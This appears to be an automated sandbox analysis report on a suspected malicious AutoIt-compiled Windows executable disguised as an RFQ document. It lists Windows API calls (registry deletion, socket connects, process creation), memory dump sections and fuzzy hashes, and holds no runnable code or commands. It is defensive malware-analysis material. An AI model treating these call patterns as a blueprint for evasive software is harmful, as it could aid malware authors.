                                                                                • Instruction Fuzzy Hash: 1B41A4B1900204EFDF24DF14C884A9A7BA9EF44315F1581AEEC09DF206D7B4DD49CBA8
                                                                                APIs
                                                                                  • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                                                                                  • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 004636B7
                                                                                • _wcscmp.LIBCMT ref: 004636D3
                                                                                • MoveFileW.KERNEL32(?,?), ref: 004636EB
                                                                                • _wcscat.LIBCMT ref: 00463733
                                                                                • SHFileOperationW.SHELL32(?), ref: 0046379F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                • String ID: \*.*
                                                                                • API String ID: 1377345388-1173974218
                                                                                • Opcode ID: 3f0f69ac01daa6019ea7883590d89e46cbcf260a567c4b816384ba6a57f53713
                                                                                • Instruction ID: 4e874dc4fae4897927e7b4621483e23afab501f30efb2571b7469179fc3cc0d5
                                                                                • Opcode Fuzzy Hash: 3f0f69ac01daa6019ea7883590d89e46cbcf260a567c4b816384ba6a57f53713
                                                                                • Instruction Fuzzy Hash: 1A418FB1508344AEC752EF65D4419DFB7E8AF88345F40082FB48AC3261FA38D689C75B
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 004872AA
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487351
                                                                                • IsMenu.USER32(?), ref: 00487369
                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004873B1
                                                                                • DrawMenuBar.USER32 ref: 004873C4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                • String ID: 0
                                                                                • API String ID: 3866635326-4108050209
                                                                                • Opcode ID: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                                                                                • Instruction ID: fcd3fc1e0e94e91f8146e9bbeff2772ee04bbaba0065c2a20de26dc7b403efd4
                                                                                • Opcode Fuzzy Hash: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                                                                                • Instruction Fuzzy Hash: AA411675A04208AFDB20EF50D894A9EBBB4FB04350F24882AFD15A7360D734ED64EB65
                                                                                APIs
                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00480FD4
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00480FFE
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004810B5
                                                                                  • Part of subcall function 00480FA5: RegCloseKey.ADVAPI32(?), ref: 0048101B
                                                                                  • Part of subcall function 00480FA5: FreeLibrary.KERNEL32(?), ref: 0048106D
                                                                                  • Part of subcall function 00480FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00481090
                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00481058
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                • String ID:
                                                                                • API String ID: 395352322-0
                                                                                • Opcode ID: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                                                                                • Instruction ID: 3e22e70b6f2616eb7250a30d7d8a48524582d6e50c9a57dc89dcd50e66651605
                                                                                • Opcode Fuzzy Hash: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                                                                                • Instruction Fuzzy Hash: E2311D71900109BFDB15AF90DC89EFFB7BCEF09300F10096BE501E2251D6745E8A9BA9
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004862EC
                                                                                • GetWindowLongW.USER32(00C11C90,000000F0), ref: 0048631F
                                                                                • GetWindowLongW.USER32(00C11C90,000000F0), ref: 00486354
                                                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00486386
                                                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004863B0
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 004863C1
                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004863DB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow$MessageSend
                                                                                • String ID:
                                                                                • API String ID: 2178440468-0
                                                                                • Opcode ID: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                                                                                • Instruction ID: de0077e50bd3e6fac1d65856e76e1ec94ed34838b8122e9b1a950ed70c11c10c
                                                                                • Opcode Fuzzy Hash: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                                                                                • Instruction Fuzzy Hash: 2B3125306001509FDB61EF18EC84F6E37E1FB4A714F1A05B9F9009F2B1CB75A8849B59
                                                                                APIs
                                                                                  • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004761C6
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 004761D5
                                                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0047620E
                                                                                • connect.WSOCK32(00000000,?,00000010), ref: 00476217
                                                                                • WSAGetLastError.WSOCK32 ref: 00476221
                                                                                • closesocket.WSOCK32(00000000), ref: 0047624A
                                                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476263
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 910771015-0
                                                                                • Opcode ID: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                                                                • Instruction ID: 9a8db824e4f103e753759010288aef610dd859574b1bdde890bb221953e34ba6
                                                                                • Opcode Fuzzy Hash: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                                                                • Instruction Fuzzy Hash: E131C671600104ABDF10BF64CC85BBE77ADEB45714F05846EFD09A7292DB78AC088B65
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: __wcsnicmp
                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                • API String ID: 1038674560-2734436370
                                                                                • Opcode ID: 659df752051c6ea00e2ad20bc59bb8864dd8c715ed7b4aab4cd92ca4da0ea462
                                                                                • Instruction ID: 032906fc094d91378a6d64986483b761754d261e1b02b5d61cc05f8db2f6dc85
                                                                                • Opcode Fuzzy Hash: 659df752051c6ea00e2ad20bc59bb8864dd8c715ed7b4aab4cd92ca4da0ea462
                                                                                • Instruction Fuzzy Hash: E621487220412166D620AA35AC02FA773D8AF59305B90443BFC4286192EB9C9D4EC29F
                                                                                APIs
                                                                                  • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                  • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                  • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00487632
                                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0048763F
                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0048764A
                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00487659
                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00487665
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                • String ID: Msctls_Progress32
                                                                                • API String ID: 1025951953-3636473452
                                                                                • Opcode ID: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                                                                                • Instruction ID: 4837c572468b061b20148283283cd62aa6e96b5405c17b40ad05b898919227a4
                                                                                • Opcode Fuzzy Hash: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                                                                                • Instruction Fuzzy Hash: B711D3B1110119BFEF109F64CC85EEB7F5DEF083A8F114115BA04A21A0D776AC21DBA8
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0048B644
                                                                                • _memset.LIBCMT ref: 0048B653
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004C6F20,004C6F64), ref: 0048B682
                                                                                • CloseHandle.KERNEL32 ref: 0048B694
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _memset$CloseCreateHandleProcess
                                                                                • String ID: oL$doL
                                                                                • API String ID: 3277943733-3421622115
                                                                                • Opcode ID: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
                                                                                • Instruction ID: 7a1fecbce043cfc874fe0d77b44da30ff063324afa3e4e90fef9887594455fd0
                                                                                • Opcode Fuzzy Hash: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
                                                                                • Instruction Fuzzy Hash: 20F05EB26403107AE2502761BC06FBB3A9CEB08395F41843ABE08E5192D7799C00C7AC
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00423F85), ref: 00424085
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0042408C
                                                                                • EncodePointer.KERNEL32(00000000), ref: 00424097
                                                                                • DecodePointer.KERNEL32(00423F85), ref: 004240B2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                • String ID: RoUninitialize$combase.dll
                                                                                • API String ID: 3489934621-2819208100
                                                                                • Opcode ID: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                                                                                • Instruction ID: 3c20c996fd7074992a56bc66f3091c9a5c2557e351e9bc0918c4c0f6e68dcf68
                                                                                • Opcode Fuzzy Hash: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                                                                                • Instruction Fuzzy Hash: DBE09270681200AFEA90AF62ED0DB8A3AA5B704743F14893AF501E11A0CFBA46489B1C
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _memmove$__itow__swprintf
                                                                                • String ID:
                                                                                • API String ID: 3253778849-0
                                                                                • Opcode ID: 51a45bc3aac73b5925831bdb2cc0ae750d8c4569182fdfc8ffca3aca7653bc8e
                                                                                • Instruction ID: 21da70feb02ff46742cf7b1a596b1e1f747712b30ca55ffc0ed3d6fa2aea8e56
                                                                                • Opcode Fuzzy Hash: 51a45bc3aac73b5925831bdb2cc0ae750d8c4569182fdfc8ffca3aca7653bc8e
                                                                                • Instruction Fuzzy Hash: 6261707160025A9BCF01EF61DC81AFE37A5AF05308F45452EF8556B293EB38AD05CB5A
                                                                                APIs
                                                                                  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                  • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004802BD
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004802FD
                                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00480320
                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00480349
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0048038C
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00480399
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                • String ID:
                                                                                • API String ID: 4046560759-0
                                                                                • Opcode ID: fefe7021bd13272d342d548016585d1103e2862b00761a5e9b4cc70dfac6524c
                                                                                • Instruction ID: d871ff08e979a7a46cd08627f86c845b9cb8169993b1d7d4ad27b4e2648fe78e
                                                                                • Opcode Fuzzy Hash: fefe7021bd13272d342d548016585d1103e2862b00761a5e9b4cc70dfac6524c
                                                                                • Instruction Fuzzy Hash: 68515C71118204AFC710EF65C885E6FBBE8FF85318F04492EF945972A2DB35E909CB56
                                                                                APIs
                                                                                • GetMenu.USER32(?), ref: 004857FB
                                                                                • GetMenuItemCount.USER32(00000000), ref: 00485832
                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0048585A
                                                                                • GetMenuItemID.USER32(?,?), ref: 004858C9
                                                                                • GetSubMenu.USER32(?,?), ref: 004858D7
                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 00485928
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Item$CountMessagePostString
                                                                                • String ID:
                                                                                • API String ID: 650687236-0
                                                                                • Opcode ID: 73639969320bcf294b28ac30933794d544fe89b2342f071dccb852350aa2c6a7
                                                                                • Instruction ID: f019c79df8c938943ad8434395c060b2cb7e18679ec399e957168710705cd923
                                                                                • Opcode Fuzzy Hash: 73639969320bcf294b28ac30933794d544fe89b2342f071dccb852350aa2c6a7
                                                                                • Instruction Fuzzy Hash: 72514C75E00615AFCF11EF65C845AAEBBB4EF48314F10446AE801BB352DB78AE418B99
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 0045EF06
                                                                                • VariantClear.OLEAUT32(00000013), ref: 0045EF78
                                                                                • VariantClear.OLEAUT32(00000000), ref: 0045EFD3
                                                                                • _memmove.LIBCMT ref: 0045EFFD
                                                                                • VariantClear.OLEAUT32(?), ref: 0045F04A
                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0045F078
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                • String ID:
                                                                                • API String ID: 1101466143-0
                                                                                • Opcode ID: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                                                                                • Instruction ID: 3df6c570488be2a998a5abfaea7cf2d50daf9fdb1352742cca5bf42246c3e2d0
                                                                                • Opcode Fuzzy Hash: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                                                                                • Instruction Fuzzy Hash: 04517D75A00209EFCB14CF58C884AAAB7B8FF4C314B15856AED49DB342E334E915CF94
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00462258
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004622A3
                                                                                • IsMenu.USER32(00000000), ref: 004622C3
                                                                                • CreatePopupMenu.USER32 ref: 004622F7
                                                                                • GetMenuItemCount.USER32(000000FF), ref: 00462355
                                                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462386
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
